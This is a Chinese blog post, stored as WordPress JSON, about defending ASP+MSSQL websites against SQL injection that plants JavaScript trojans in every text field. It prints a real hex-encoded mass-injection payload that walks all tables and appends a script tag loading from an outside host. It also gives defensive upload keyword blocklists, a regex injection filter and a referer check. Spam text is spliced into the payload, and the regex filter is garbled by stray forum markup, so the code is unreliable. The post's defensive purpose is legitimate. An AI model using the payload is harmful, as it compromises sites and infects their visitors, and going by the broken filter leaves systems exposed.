{"id":13,"date":"2010-05-07T01:07:25","date_gmt":"2010-05-07T01:07:25","guid":{"rendered":"http:\/\/blog.yyhcw.com\/post\/13.html"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T07:54:17","slug":"","status":"publish","type":"post","link":"http:\/\/blog.yyhcw.com\/post\/13.html","title":{"rendered":"\u5982\u4f55\u9632\u8303\u6570\u636e\u5e93\u88ab\u6302\u9a6c\u63d2\u5165JS\/SQL\u6ce8\u5165"},"content":{"rendered":"<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u6700\u8fd1\uff0c\u91c7\u7528ASP+MSSQL\u8bbe\u8ba1\u7684\u5f88\u591a\u7f51\u7ad9\u53ef\u80fd\u906d\u9047\u5230sql\u6570\u636e\u5e93\u88ab\u6302\u9a6c\u8005\u63d2\u5165JS\u6728\u9a6c\u7684\u7ecf\u5386\uff1b\u8fd9\u4e0d\uff0c\u670b\u53cb\u7684\u4e00\u4e2a\u7f51\u7ad9\u5c31\u88ab\u9ed1\u5ba2\u5ffd\u60a0\u4e86\u4e00\u628a\uff0cmssql\u7684\u6bcf\u4e2avarchar\u3001text\u5b57\u6bb5\u90fd\u88ab\u81ea\u52a8\u63d2\u5165\u4e00\u6bb5js\u4ee3\u7801\uff0c\u5373\u4f7f\u5220\u9664\u8fd9\u6bb5\u4ee3\u7801\uff0c\u5982\u679c\u6ca1\u6709\u4ece\u6e90\u5934\u4e0a\u89e3\u51b3\uff0c\u51e0\u5206\u949f\u540e\uff0cjs\u4ee3\u7801\u5c31\u53c8\u4f1a\u81ea\u52a8\u63d2\u5165\u6570\u636e\u5e93\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u7ecf\u8fc7\u98d8\u6613\u7684\u89c2\u5bdf\uff0c\u8fd9\u5f88\u6709\u53ef\u80fd\u662f\u7a0b\u5e8f\u81ea\u52a8\u6267\u884c\u7684\uff0c\u9ed1\u5ba2\u5148\u4ece\u641c\u7d22\u5f15\u64cegoogle\u3001\u767e\u5ea6\u7b49\u641c\u7d22\u5b58\u5728\u6f0f\u6d1e\u7684\u91c7\u7528asp+mssql\u8bbe\u8ba1\u7684\u7f51\u7ad9\uff0c\u7136\u540e\u91c7\u7528\u5c0f\u660e\u5b50\u8fd9\u6837\u7684\u6ce8\u5165\u626b\u63cf\u5de5\u5177\uff0c\u626b\u63cf\u6574\u4e2a\u7f51\u7ad9\uff0c\u4e00\u65e6\u53d1\u73b0\u6709sql\u6ce8\u5165\u7684\u6f0f\u6d1e\u6216\u8005\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u9ed1\u5ba2\u5c31\u901a\u8fc7\u5404\u79cd\u624b\u6bb5\uff0c\u4e0a\u4f20\u81ea\u5df1\u7684\u5927\u9a6c\uff0c\u5982\u6d77\u9633\u6728\u9a6c\uff1b\u7136\u540e\uff0c\u9ed1\u5ba2\u5c31\u628a\u8fd9\u4e2a\u7f51\u7ad9\u7eb3\u5165\u4ed6\u7684\u8089\u9e21\u5217\u8868\uff0c\u968f\u65f6\u5728\u6570\u636e\u5e93\u91cc\u52a0\u5165\u81ea\u5df1\u5e0c\u671b\u52a0\u7684js\u4ee3\u7801\uff0c\u800c\u8fd9\u4e9b\u4ee3\u7801\u5f80\u5f80\u662f\u5305\u542b\u7740\u4f17\u591a\u7684\u7684\u75c5\u6bd2\u3001\u6728\u9a6c\uff0c\u6700\u7ec8\u8ba9\u8bbf\u95ee\u53d7\u63a7\u7f51\u7ad9\u7684\u7528\u6237\u7684\u7535\u8111\u4e2d\u6bd2\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u867d\u7136\uff0c\u53ef\u4ee5\u901a\u8fc7sql\u67e5\u8be2\u5206\u6790\u5668\u6267\u884c\u6279\u91cf\u4ee3\u6362\uff0c\u6682\u65f6\u89e3\u51b3\u88ab\u63d2\u5165\u7684js\u4ee3\u7801\u95ee\u9898\uff0c\u7136\u800c\u4e0d\u4ece\u6839\u672c\u4e0a\u89e3\u51b3\u6574\u4e2a\u7f51\u7ad9\u5b58\u5728\u7684\u6f0f\u6d1e\uff0c\u5305\u62ec\u7a0b\u5e8f\u4e0a\u548c\u670d\u52a1\u5668\u5b89\u5168\u6743\u9650\uff0c\u90a3\u4e48\u9ed1\u5ba2\u8fd8\u662f\u968f\u65f6\u53ef\u4ee5\u5165\u4fb5\u4f60\u7684\u7f51\u7ad9\u6570\u636e\u5e93\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u5728sql\u67e5\u8be2\u5206\u6790\u5668\u91cc\u53ef\u4ee5\u6267\u884c\u4ee5\u4e0b\u7684\u4ee3\u7801\u6279\u91cf\u66ff\u6362js\u4ee3\u7801\uff1a<br \/>&ldquo;update \u8868\u540d set \u5b57\u6bb5\u540d=replace(\u5b57\u6bb5\u540d,'&lt;Script Src=http:\/\/c.n%21863.cn\/css\/c.js&gt;&lt;\/Script&gt;','') &rdquo;<\/p>\n<p>flymorn\u4ed4\u7ec6\u68c0\u67e5\u4e86\u7f51\u7ad9\uff0c\u53d1\u73b0\u7f51\u7ad9\u5b58\u5728\u51e0\u4e2a\u5b89\u5168\u95ee\u9898\uff1a<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;<strong>\u7b2c\u4e00\uff0c\u7f51\u7ad9\u5b58\u5728\u4e0a\u4f20\u6f0f\u6d1e<\/strong><\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u867d\u7136\uff0c\u4e0a\u4f20\u6587\u4ef6\u9700\u8981\u7ba1\u7406\u5458\u8eab\u4efd\u9a8c\u8bc1\uff0c\u4e5f\u5bf9\u4e0a\u4f20\u6587\u4ef6\u8fdb\u884c\u4e86\u6587\u4ef6\u683c\u5f0f\u7684\u8ba4\u8bc1\uff0c\u4f46\u7ba1\u7406\u5458\u8eab\u4efd\u9a8c\u8bc1\u91c7\u7528\u4e86cookies\uff0c\u800ccookies\u662f\u53ef\u4ee5\u88ab\u4f2a\u9020\u7684\uff0c\u800c\u4e14\u5982\u679c\u4e0a\u4f20\u4e86\u56fe\u7247\u540e\uff0c\u4e0d\u5bf9\u8be5\u6587\u4ef6\u7684\u5185\u5bb9\u91c7\u53d6\u4efb\u4f55\u5224\u65ad\u7684\u8bdd\uff0c\u90a3\u4e48\u56fe\u7247\u6728\u9a6c\u4e5f\u5f88\u6709\u53ef\u80fd\u88ab\u4e0a\u4f20\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u89e3\u51b3\u63aa\u65bd\uff1a1 \u5220\u9664\u4e0a\u4f20\u6587\u4ef6\u529f\u80fd\uff08\u4e0d\u592a\u5b9e\u9645\uff09\uff1b2 \u4fee\u6539\u4e0a\u4f20\u7528\u6237\u9a8c\u8bc1\u4e3asession\u9a8c\u8bc1\uff1b3 \u5bf9\u4e0a\u4f20\u540e\u7684\u6587\u4ef6\u5185\u5bb9\u8fdb\u884c\u9a8c\u8bc1\uff0c\u5982\u679c\u662f\u56fe\u7247\u6728\u9a6c\uff0c\u5219\u5220\u9664\uff1b\u53ef\u4ee5\u53c2\u8003\u4ee5\u4e0b\u7684\u9a8c\u8bc1\u4ee3\u7801\uff1a<\/p>\n<p>''===============\u5224\u65ad\u4e0a\u4f20\u6587\u4ef6\u662f\u5426\u542b\u975e\u6cd5\u5b57\u7b26\u4e32start================<br \/>set MyFile = server.CreateObject(&quot;Scripting.FileSystemObject&quot;)<br \/>set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '\u8bfb\u53d6\u6587\u672c\u6587\u4ef6<br \/>sTextAll = lcase(MyText.ReadAll)<br \/>MyText.close<br \/>set MyFile = nothing<br \/>sStr=&quot;&lt;%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language=&quot;<br \/>sNoString = split(sStr,&quot;|&quot;) <br \/>for i=0 to ubound(sNoString)<br \/>&nbsp;&nbsp;if instr(sTextAll,sNoString(i)) then<br \/>&nbsp;&nbsp;&nbsp;&nbsp;set filedel = server.CreateObject(&quot;Scripting.FileSystemObject&quot;)<br \/>&nbsp;&nbsp;&nbsp;&nbsp;filedel.deletefile Server.mappath(filePath)<br \/>&nbsp;&nbsp;&nbsp;&nbsp;set filedel = nothing<br \/>&nbsp;&nbsp;&nbsp;&nbsp;Response.Write(&quot;&lt;script&gt;alert('\u60a8\u4e0a\u4f20\u7684\u6587\u4ef6\u6709\u95ee\u9898\uff0c\u4e0a\u4f20\u5931\u8d25\uff01');history.back();&lt;\/script&gt;&quot;)<br \/>&nbsp;&nbsp;&nbsp;&nbsp;Response.End<br \/>&nbsp;&nbsp;end if<br \/>next<br \/>''=================\u5224\u65ad\u4e0a\u4f20\u6587\u4ef6\u662f\u5426\u542b\u975e\u6cd5\u5b57\u7b26\u4e32end===================<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>\u7b2c\u4e8c\uff0c\u7f51\u7ad9\u5b58\u5728cookies\u6ce8\u5165\u6f0f\u6d1e<\/strong><\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u7531\u4e8e\u7a0b\u5e8f\u8bbe\u8ba1\u4e2d\uff0c\u4e3a\u4e86\u8003\u8651\u5230\u51cf\u5c0f\u670d\u52a1\u5668\u7684\u5f00\u9500\uff0c\u6240\u6709\u7528\u6237\u767b\u9646\u540e\u91c7\u7528cookies\u9a8c\u8bc1\uff0c\u8fd9\u4e2acookies\u91cc\u4fdd\u5b58\u4e86\u7528\u6237\u7684 ID \u548c NAME \uff0c\u800c\u4f17\u6240\u5468\u77e5\uff0ccookies\u662f\u7ecf\u5e38\u88ab\u9ed1\u5ba2\u4f2a\u9020\u7684\uff0c\u8fd9\u662f\u5176\u4e00\uff1b\u53e6\u5916\uff0c\u67d0\u4e9b\u5916\u90e8\u53c2\u6570 \u6ca1\u6709\u91c7\u7528\u4e25\u683c\u7684 request.form \u548c request.querystring \u6765\u83b7\u53d6\u5185\u5bb9\uff0c\u4e3a\u4e86\u7b80\u4fbf\uff0c\u91c7\u7528\u4e86 request(&quot;id&quot;) \u8fd9\u6837\u7684\u65b9\u5f0f\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp; \u6211\u4eec\u77e5\u9053\uff0cASP \u7684request \u662f\u5148\u4eceform\u3001querystring\u91cc\u83b7\u53d6\u5185\u5bb9\uff0c\u5982\u679c\u8fd9\u4e24\u4e2a\u4e3a\u7a7a\uff0c\u5219\u8981\u4ececookies\u91cc\u83b7\u53d6\u5185\u5bb9\uff0c\u5927\u5bb6\u5f80\u5f80\u5728\u7a0b\u5e8f\u8bbe\u8ba1\u4e2d\u8003\u8651\u5230\u4e86 request.form \u548c request.querystring \u7684SQL\u6ce8\u5165\uff0c\u6240\u4ee5\u4e00\u822c\u90fd\u4f1a\u8fc7\u6ee4 request.form \u548c request.querystring\u8fdb\u884csql\u6ce8\u5165\uff1b\u4f46\u5374\u504f\u504f\u5fd8\u4e86\u8fc7\u6ee4cookies\u65b9\u5f0f\u4e0b\u7684\u6ce8\u5165\u3002\u6211\u4eec\u6765\u770b\u4e0b\u4e0b\u9762\u8fd9\u6837\u7684sql\u8bed\u53e5\uff1a<br \/>&nbsp;<\/p>\n<p>SQL=&quot;select * from \u8868\u540d where id=&quot;&amp;request(&quot;id&quot;)<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u5982\u679c\u8fd9\u4e2a id \u6070\u5de7\u662f\u901a\u8fc7cookies\u6765\u83b7\u53d6\u503c\u7684\uff0c\u90a3\u4e48\u60f3\u60f3\uff0c\u8fd9\u662f\u4e00\u4ef6\u591a\u4e48\u53ef\u6015\u7684\u4e8b\u554a\uff01\u6ce8\u5165\u8005\u53ef\u4ee5\u8f7b\u677e\u7684\u4f2a\u9020\u4e00\u4e2a\u540d\u4e3a id \u7684\u865a\u5047 cookies \uff0c\u56e0\u4e3a\u8fd9\u4e2a id \u7684cookies \u662f\u670d\u52a1\u5668\u5206\u914d\u7ed9\u5b83\u7684\u3002\u8fd9\u4e2acookies\u53ef\u4ee5\u88ab\u4f2a\u9020\u6210\u7c7b\u4f3c\u4e0b\u9762\u8fd9\u6837\u7684\u4e00\u6bb5\u4ee3\u7801\uff1a<br \/>&nbsp;<\/p>\n<p>dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6<br \/>15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT\u4eba\u624d\u7f51(http:\/\/it.ad0.cn) 12e6e416d452c622e6e416d<br \/>452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6<br \/>94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3<br \/>335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375<br \/>72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768<br \/>696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742<br \/>b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275<br \/>d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537<br \/>352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6<br \/>37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4<br \/>3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u770b\u6655\u4e86\u5427\u3002\u8fd9\u662f\u5229\u7528HEX\u7684\u65b9\u5f0f\u8fdb\u884cSQL\u6ce8\u5165\uff0c\u53ef\u4ee5\u7ed5\u8fc7\u4e00\u822c\u7684IDS\u9a8c\u8bc1\uff0c\u53ea\u8981\u7cfb\u7edf\u5b58\u5728SQL\u6ce8\u5165\uff0c\u4e0a\u9762\u7684\u4ee3\u7801\u5c06\u4f1a\u88ab\u6267\u884c\uff0c\u901a\u8fc7\u6e38\u6807\u904d\u5386\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\u548c\u5217\u5e76\u5728\u5217\u4e2d\u63d2\u5165js\u4ee3\u7801\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp; \u89e3\u51b3\u529e\u6cd5\uff1a1 \u4e25\u683c\u8fc7\u6ee4 request.form \u548c request.querystring \u83b7\u53d6\u7684\u5185\u5bb9\uff0c\u575a\u51b3\u4e0d\u7528 request(&quot;name&quot;) \u8fd9\u6837\u7684\u65b9\u5f0f\u83b7\u53d6\u503c\uff0c\u51e1\u662f\u91c7\u7528 cookies \u4fdd\u5b58\u7684\u5185\u5bb9\uff0c\u5c3d\u91cf\u4e0d\u8981\u7528\u5728sql\u8bed\u53e5\u91cc\u8fdb\u884c\u67e5\u8be2\u6570\u636e\u5e93\u64cd\u4f5c\uff1b2 \u91cd\u8981\u7684\u7528\u6237\u8d44\u6599\u5c3d\u91cf\u91c7\u7528 session \u9a8c\u8bc1\uff0c\u56e0\u4e3asession\u662f\u670d\u52a1\u5668\u7aef\u7684\uff0c\u5ba2\u6237\u7aef\u65e0\u6cd5\u4f2a\u9020\u6570\u636e\uff0c\u9664\u975e\u4ed6\u6709\u4f60\u670d\u52a1\u5668\u7684\u6743\u9650\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u53ef\u4ee5\u91c7\u7528\u4ee5\u4e0b\u7684\u9632\u8303 get \u3001post\u4ee5\u53cacookies \u6ce8\u5165\u7684\u4ee3\u7801\u6765\u8fc7\u6ee4 sql \u6ce8\u5165\u653b\u51fb\uff1a<\/p>\n<p>&lt;%<br \/>Response.Buffer = True&nbsp;&nbsp;'\u7f13\u5b58\u9875\u9762<br \/>'\u9632\u8303get\u6ce8\u5165<br \/>If Request.QueryString &lt;&gt; &quot;&quot;&nbsp;&nbsp;Then StopInjection(Request.QueryString)<br \/>'\u9632\u8303post\u6ce8\u5165<br \/>If Request.Form &lt;&gt; &quot;&quot;&nbsp;&nbsp;Then StopInjection(Request.Form)<br \/>'\u9632\u8303cookies\u6ce8\u5165<br \/>If Request.Cookies &lt;&gt; &quot;&quot;&nbsp;&nbsp;Then StopInjection(Request.Cookies)<\/p>\n<p>'\u6b63\u5219\u5b50\u51fd\u6570<br \/>Function StopInjection(Values)<br \/>Dim regEx<br \/>Set regEx = New RegExp<br \/>&nbsp;&nbsp;&nbsp;&nbsp;regEx.IgnoreCase = True<br \/>&nbsp;&nbsp;&nbsp;&nbsp;regEx.Global = True<br \/>&nbsp;&nbsp;&nbsp;&nbsp;regEx.Pattern = &quot;'|;|#|([\\s\\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[\/s\/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\\s\\b[\/email]+]*)&quot;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;Dim sItem, sValue<br \/>&nbsp;&nbsp;&nbsp;&nbsp;For Each sItem In Values<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sValue = Values(sItem)<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If regEx.Test(sValue) Then<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Response.Write &quot;&lt;Script Language=javascript&gt;alert('\u975e\u6cd5\u6ce8\u5165\uff01\u4f60\u7684\u884c\u4e3a\u5df2\u88ab\u8bb0\u5f55\uff01\uff01');history.back(-1);&lt;\/Script&gt;&quot;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Response.End<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End If<br \/>&nbsp;&nbsp;&nbsp;&nbsp;Next<br \/>&nbsp;&nbsp;&nbsp;&nbsp;Set regEx = Nothing<br \/>End function<br \/>%&gt;<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u628a\u4ee5\u4e0a\u7684\u4ee3\u7801\u53e6\u5b58\u4e3a\u4e00\u4e2a\u6587\u4ef6\uff0c\u5982 antisql.asp \uff0c\u7136\u540e\u5728\u6570\u636e\u5e93\u8fde\u63a5\u6587\u4ef6\u5f00\u5934\u5305\u542b\u8fd9\u4e2a\u6587\u4ef6 &lt;!--#include file=&quot;antisql.asp&quot;--&gt; \uff0c\u5c31\u53ef\u4ee5\u5b9e\u73b0\u5168\u7ad9\u7684\u9632\u8303 sql \u6ce8\u5165\u7684\u653b\u51fb\u4e86\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;<strong>\u7b2c\u4e09\uff0c\u4e25\u683c\u8fc7\u6ee4\u5916\u90e8\u63d0\u4ea4\u6570\u636e<\/strong><\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u5224\u65ad\u63d0\u4ea4\u9875\u9762\u7684\u6765\u6e90\uff0c\u5982\u679c\u4e0d\u662f\u5f53\u524d\u7ad9\u70b9\uff0c\u5219\u62d2\u7edd\u63d0\u4ea4\u3002\u53ef\u4ee5\u53c2\u8003\u4ee5\u4e0b\u7684\u4ee3\u7801\uff0c\u867d\u7136\u6765\u6e90\u7f51\u5740\u53ef\u4ee5\u4f2a\u9020\uff0c\u4f46\u6709\u8fd9\u6837\u7684\u5224\u65ad\uff0c\u6bd5\u7adf\u53ef\u4ee5\u963b\u6321\u90a3\u4e9b\u6ca1\u6709\u6280\u672f\u542b\u91cf\u7684\u6076\u610f\u63d0\u4ea4\uff1a<\/p>\n<p>&lt;%''\u5224\u65ad\u6765\u6e90\uff0c\u7981\u6b62\u5916\u90e8\u63d0\u4ea4<br \/>dim server_v1,server_v2<br \/>server_v1=Cstr(Request.ServerVariables(&quot;HTTP_REFERER&quot;))<br \/>server_v2=Cstr(Request.ServerVariables(&quot;SERVER_NAME&quot;))<br \/>if server_v1=&quot;&quot; or instr(server_v1,&quot;\u53d1\u8868\u9875\u9762\u540d&quot;)&lt;=0 or mid(server_v1,8,len(server_v2))&lt;&gt;server_v2 then<br \/>response.write &quot;&lt;SCRIPT language=JavaScript&gt;alert('\u6765\u6e90\u975e\u6cd5\uff0c\u7981\u6b62\u5916\u90e8\u63d0\u4ea4\uff01');&quot;<br \/>response.write &quot;this.location.href='vbscript:history.back()';&lt;\/SCRIPT&gt;&quot;<br \/>response.end<br \/>end if%&gt;<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>\u7b2c\u56db\uff0c\u505a\u597d\u670d\u52a1\u5668\u6743\u9650\u7684\u5206\u914d<\/strong><\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u5bf9\u4e8e\u6570\u636e\u5e93\u7684\u6743\u9650\uff0c\u5c3d\u91cf\u5206\u914d\u6700\u5c0f\u7684\u6743\u9650\u7ed9\u7528\u6237\u4f7f\u7528\uff0c\u5982\u679c\u628asa\u6216\u7ba1\u7406\u5458\u7684\u6743\u9650\u5206\u4e0b\u6765\uff0c\u4e00\u65e6\u88ab\u653b\u51fb\u6ca6\u9677\uff0c\u8fd9\u5c06\u662f\u4e00\u4e2a\u6bc1\u706d\u6027\u7684\u6253\u51fb\u3002mssql \u76841433\u7aef\u53e3\uff0c\u98d8\u6613\u5efa\u8bae\u4e0d\u7528\u7684\u65f6\u5019\uff0c\u6700\u597d\u5173\u95ed\u3002<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;\u603b\u4e4b\uff0c\u5b89\u5168\u95ee\u9898\u662f\u4e00\u4e2a\u7efc\u5408\u7684\u95ee\u9898\uff0c\u4e00\u4e2a\u5c0f\u7684\u7ec6\u8282\uff0c\u53ef\u80fd\u8ba9\u4f60\u7684\u51e0\u4e2a\u6708\u751a\u81f3\u51e0\u5e74\u7684\u5fc3\u8840\u4ed8\u4e4b\u4e1c\u6d41\u3002\u6211\u4eec\u4e0d\u4ec5\u8981\u4ece\u7a0b\u5e8f\u4e0a\u7740\u624b\u6bcf\u4e2a\u7ec6\u8282\uff0c\u800c\u4e14\u8981\u4ed4\u7ec6\u505a\u597d\u670d\u52a1\u5668\u7684\u5b89\u5168\u5de5\u4f5c\uff0c\u5bf9\u4e8e\u865a\u62df\u4e3b\u673a\u7684\u7528\u6237\uff0c\u8fd8\u8981\u9632\u8303\u670d\u52a1\u5668\u4e0a\u7684\u8de8\u7ad9\u653b\u51fb\u3002\u7ec6\u8282\u51b3\u5b9a\u6210\u8d25\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u6700\u8fd1\uff0c\u91c7\u7528ASP+MSSQL\u8bbe\u8ba1\u7684\u5f88\u591a \u00b7\u00b7\u00b7","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"views":247,"_links":{"self":[{"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/posts\/13"}],"collection":[{"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/comments?post=13"}],"version-history":[{"count":0,"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/posts\/13\/revisions"}],"wp:attachment":[{"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/media?parent=13"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/categories?post=13"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/blog.yyhcw.com\/api\/wp\/v2\/tags?post=13"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}